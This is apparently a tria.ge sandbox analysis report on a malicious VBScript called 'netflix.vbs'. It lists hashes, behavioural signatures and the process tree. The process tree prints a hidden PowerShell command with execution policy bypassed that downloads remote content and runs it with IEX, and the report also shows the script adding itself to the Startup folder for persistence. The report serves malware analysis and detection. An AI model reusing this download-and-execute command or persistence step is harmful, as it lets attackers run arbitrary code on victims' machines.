Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14/10/2023, 01:05
Static task
static1
Behavioral task
behavioral1
Sample
netflix.vbs
Resource
win7-20230831-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
netflix.vbs
Resource
win10v2004-20230915-en
7 signatures
150 seconds
General
-
Target
netflix.vbs
-
Size
1000B
-
MD5
3e4a20fd9f6d3e595eba5ab59c868cb6
-
SHA1
660ba0a49f0d9db61c1054c78abbce232bc8401c
-
SHA256
70d3f1296d41d516e04e53e58f812207d5f675ebb1e9686ed4b8552cb062544b
-
SHA512
85838fd9828c8fc91f0985c8f3e3b1a3c03425e3aba5517104dcbd96c63115545758a625b59bf2d6beaf225758e8af375fc774d6cc612ebef9a126732c200dd8
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://www.netflix.com/
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1940 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netflix.vbs WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netflix.vbs WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1940 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1940 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2292 wrote to memory of 2132 2292 WScript.exe 28 PID 2292 wrote to memory of 2132 2292 WScript.exe 28 PID 2292 wrote to memory of 2132 2292 WScript.exe 28 PID 2132 wrote to memory of 1940 2132 cmd.exe 30 PID 2132 wrote to memory of 1940 2132 cmd.exe 30 PID 2132 wrote to memory of 1940 2132 cmd.exe 30 PID 2132 wrote to memory of 1940 2132 cmd.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\netflix.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.netflix.com/');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.netflix.com/');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull3⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-